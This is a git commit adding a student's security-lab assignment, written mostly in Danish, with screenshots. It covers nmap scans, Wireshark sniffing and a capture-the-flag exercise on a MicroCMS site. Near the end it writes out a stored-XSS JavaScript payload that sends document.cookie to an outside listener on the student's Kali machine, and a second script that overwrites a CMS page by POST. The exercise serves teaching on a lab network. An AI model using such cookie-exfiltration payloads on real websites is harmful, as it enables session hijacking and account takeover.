diff options
| author | Julian T <julian@jtle.dk> | 2020-05-29 11:33:16 +0200 |
|---|---|---|
| committer | Julian T <julian@jtle.dk> | 2020-05-29 11:33:16 +0200 |
| commit | 5f685d13741afa720f8866a3e412beab11c279e4 (patch) | |
| tree | 3602d3fe5db64b0509ad356fa6ab255e2f0aeea6 /sem4/sec/t3 | |
| parent | 284afc630b3d0dd6c0079c6d3e83a73d6d1193e0 (diff) | |
Added missing sec assignments
Diffstat (limited to 'sem4/sec/t3')
| -rw-r--r-- | sem4/sec/t3/ifconfig.png | bin | 0 -> 211904 bytes | |||
| -rw-r--r-- | sem4/sec/t3/microcms_403.png | bin | 0 -> 29305 bytes | |||
| -rw-r--r-- | sem4/sec/t3/microcms_404.png | bin | 0 -> 30029 bytes | |||
| -rw-r--r-- | sem4/sec/t3/microcms_bold.png | bin | 0 -> 40777 bytes | |||
| -rw-r--r-- | sem4/sec/t3/microcms_front.png | bin | 0 -> 19276 bytes | |||
| -rw-r--r-- | sem4/sec/t3/microcms_java.png | bin | 0 -> 32763 bytes | |||
| -rw-r--r-- | sem4/sec/t3/microcms_url.png | bin | 0 -> 32103 bytes | |||
| -rw-r--r-- | sem4/sec/t3/nmap1.png | bin | 0 -> 172875 bytes | |||
| -rw-r--r-- | sem4/sec/t3/opgaver.md | 127 | ||||
| -rw-r--r-- | sem4/sec/t3/os.png | bin | 0 -> 95809 bytes | |||
| -rw-r--r-- | sem4/sec/t3/php-server.png | bin | 0 -> 28422 bytes | |||
| -rw-r--r-- | sem4/sec/t3/portscan.png | bin | 0 -> 57419 bytes | |||
| -rw-r--r-- | sem4/sec/t3/stealth.png | bin | 0 -> 65266 bytes | |||
| -rw-r--r-- | sem4/sec/t3/webserver.png | bin | 0 -> 46017 bytes | |||
| -rw-r--r-- | sem4/sec/t3/webserver_firefox.png | bin | 0 -> 46295 bytes | |||
| -rw-r--r-- | sem4/sec/t3/wireshark_post.png | bin | 0 -> 22908 bytes |
16 files changed, 127 insertions, 0 deletions
diff --git a/sem4/sec/t3/ifconfig.png b/sem4/sec/t3/ifconfig.png Binary files differnew file mode 100644 index 0000000..b4e42e8 --- /dev/null +++ b/sem4/sec/t3/ifconfig.png diff --git a/sem4/sec/t3/microcms_403.png b/sem4/sec/t3/microcms_403.png Binary files differnew file mode 100644 index 0000000..7315fef --- /dev/null +++ b/sem4/sec/t3/microcms_403.png diff --git a/sem4/sec/t3/microcms_404.png b/sem4/sec/t3/microcms_404.png Binary files differnew file mode 100644 index 0000000..737b779 --- /dev/null +++ b/sem4/sec/t3/microcms_404.png diff --git a/sem4/sec/t3/microcms_bold.png b/sem4/sec/t3/microcms_bold.png Binary files differnew file mode 100644 index 0000000..1d378d3 --- /dev/null +++ b/sem4/sec/t3/microcms_bold.png diff --git a/sem4/sec/t3/microcms_front.png b/sem4/sec/t3/microcms_front.png Binary files differnew file mode 100644 index 0000000..3161537 --- /dev/null +++ b/sem4/sec/t3/microcms_front.png diff --git a/sem4/sec/t3/microcms_java.png b/sem4/sec/t3/microcms_java.png Binary files differnew file mode 100644 index 0000000..a4a2883 --- /dev/null +++ b/sem4/sec/t3/microcms_java.png diff --git a/sem4/sec/t3/microcms_url.png b/sem4/sec/t3/microcms_url.png Binary files differnew file mode 100644 index 0000000..259492c --- /dev/null +++ b/sem4/sec/t3/microcms_url.png diff --git a/sem4/sec/t3/nmap1.png b/sem4/sec/t3/nmap1.png Binary files differnew file mode 100644 index 0000000..21c955c --- /dev/null +++ b/sem4/sec/t3/nmap1.png diff --git a/sem4/sec/t3/opgaver.md b/sem4/sec/t3/opgaver.md new file mode 100644 index 0000000..454d8fe --- /dev/null +++ b/sem4/sec/t3/opgaver.md @@ -0,0 +1,127 @@ +# Opgaver til T3 del 1 + +> Brug ifconfig til at finde ud af hvilket netværk I er på, og hvilke andre maskiner der potentielt kan være på samme netværk. + +Først finder jeg ip. + + + +Derefter laver jeg en ip scan på netwærket. +Læg mærke til ip og mask da dette skal bruges igen i nmap. + + + +Her kan jeg se at der er nogle forskellige enheder der **svarer**. + +- 10.150.89.2 +- 10.150.89.3 +- 10.150.89.4 +- 10.150.89.5 +- 10.150.89.31 +- 10.150.89.41 +- 10.150.89.51 +- 10.150.89.108 +- 10.150.89.159 +- 10.150.89.164 + +> Brug nmap til at finde andre maskiner i netværket. Prøv forskellige typer af scanninger, og evaluer hvilke informationer I får ud af det vs. hvor lang tid det tager at gennemføre scanningerne. + +Først prøves en simpel fuld portscan. + + + +Dette tog 2.19 sekunder. + +Derefter prøves en stealth scan + + + +Dette tog 2.45 sekunder. +Og giver det samme resultat som en normal portscan. + +> Brug nmap til at finde ud af hvilke operativsystemer der kører på de forskellige maskiner i lab'et. + +Nu prøves en OS scan hvor den kigger på finger prints. +Dette gøres med `-O`. + + + +Dette tog 7.17 sekunder. +Man kan også se at den har fundet information om hvilket OS og version modtager bruger. +Det er også sjovt at se at den ikke har kunne bestemme `10.150.89.2`. + +> Find en web-server (der kun er web-server). + +Her kigges i resultaterne fra den sidste scan. + + + +Nu checkes der om det faktisk er en webserver der lytter. + + + +Yay. + +> Al trafik i lab'et kører gennem jeres Kali-maskine. Kan I finde et ikke-krypteret login et sted i trafikken? (brug Wireshark) + +Login kommer tit gennem http POST request, så det kan man prøve at sortere efter i wireshark. + + + +> Prøv at find flaget i MicroCMS hjemmesiden - det kræver lidt kreativitet, men ingen værktøjer + +Efter at have kigget lidt på de forskellige servere blev MicroCMS hjemmesiden fundet på `10.150.89.164`. + + + +Det ser ud til at man kan lave sider og man kan redigere sidder. +Den mest aktive ser ud til at være `Event 1` der snakker om et møde i næste uge. + +Først prøver jeg at redigere `Event 1` ved at tilføje lidt tekst. +Efter redigering er testes indsættes `hej med <b>dig</b>`. + + + +Yay det virker, så kan man måske også indsætte billeder og javascript. +Hvis der er andre der også er på siden, hvad kan man så få ud af dem? + +Url'erne til at få en side har følgende format `/page.php?view=2`. +Hvad hvis man prøver nogle af de andre tal efter 2. + + + +That was expected. + + + +What if we change `view` to `edit`? + + + +Okay. Can we place some javascript that will send the content of this page to a webserver? +Lets start with one that sends all cookies. + +``` +var x = new XMLHttpRequest; x.open("GET", "http://10.150.89.5:4000/" + document.cookie, true); x.send( null ) +``` + +This will send a GET with the cookie in the url. +On the local kali machine a webserver is started with php -S. +This will print all request send, even if they 404. + + + +Now this javascript is placed as a script tag in the `Event 1` document. + + + +After waiting a short while nothing happened. +Going to try something else. +The following will edit page 11 with some data ( in this case "hej medddd dig" ). + +``` +var x = new XMLHttpRequest; x.open("POST", "http://10.150.89.164/page.php?edit=11", true); var f = new FormData(); f.append("title", "testi"); f.append("content", "hej medddd dig"); x.send( f ) +``` + +Now content is replaced by document.cookie and placed in meeting thing. + diff --git a/sem4/sec/t3/os.png b/sem4/sec/t3/os.png Binary files differnew file mode 100644 index 0000000..ef361ab --- /dev/null +++ b/sem4/sec/t3/os.png diff --git a/sem4/sec/t3/php-server.png b/sem4/sec/t3/php-server.png Binary files differnew file mode 100644 index 0000000..6f34499 --- /dev/null +++ b/sem4/sec/t3/php-server.png diff --git a/sem4/sec/t3/portscan.png b/sem4/sec/t3/portscan.png Binary files differnew file mode 100644 index 0000000..da16319 --- /dev/null +++ b/sem4/sec/t3/portscan.png diff --git a/sem4/sec/t3/stealth.png b/sem4/sec/t3/stealth.png Binary files differnew file mode 100644 index 0000000..098d49b --- /dev/null +++ b/sem4/sec/t3/stealth.png diff --git a/sem4/sec/t3/webserver.png b/sem4/sec/t3/webserver.png Binary files differnew file mode 100644 index 0000000..24f480b --- /dev/null +++ b/sem4/sec/t3/webserver.png diff --git a/sem4/sec/t3/webserver_firefox.png b/sem4/sec/t3/webserver_firefox.png Binary files differnew file mode 100644 index 0000000..1fa4b29 --- /dev/null +++ b/sem4/sec/t3/webserver_firefox.png diff --git a/sem4/sec/t3/wireshark_post.png b/sem4/sec/t3/wireshark_post.png Binary files differnew file mode 100644 index 0000000..4cd260e --- /dev/null +++ b/sem4/sec/t3/wireshark_post.png |
